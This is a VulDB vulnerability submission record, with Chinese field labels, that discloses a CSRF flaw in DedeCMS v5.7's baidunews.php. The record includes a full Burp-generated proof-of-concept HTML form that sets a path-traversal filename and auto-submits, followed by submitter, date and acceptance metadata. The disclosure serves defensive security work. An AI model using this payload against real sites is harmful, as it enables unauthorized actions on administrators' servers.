| 标题 | Github Democms v5.7 CSRF |
|---|
| 描述 | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/baidunews.php
<html>
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/src/dede/baidunews.php?do=yes" method="POST">
<input type="hidden" name="filename" value="../data/baidunews.xml" />
<input type="hidden" name="button" value="�¼€�§‹�”Ÿ�ˆ" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> |
|---|
| 来源 | ⚠️ https://github.com/E1CHO/demo/blob/main/26.pdf |
|---|
| 用户 | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| 提交 | 2024-03-14 10時27分 (2 年前) |
|---|
| 管理 | 2024-03-22 11時37分 (8 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 257707 [DedeCMS 5.7 /src/dede/baidunews.php filename 跨网站请求伪造] |
|---|
| 积分 | 20 |
|---|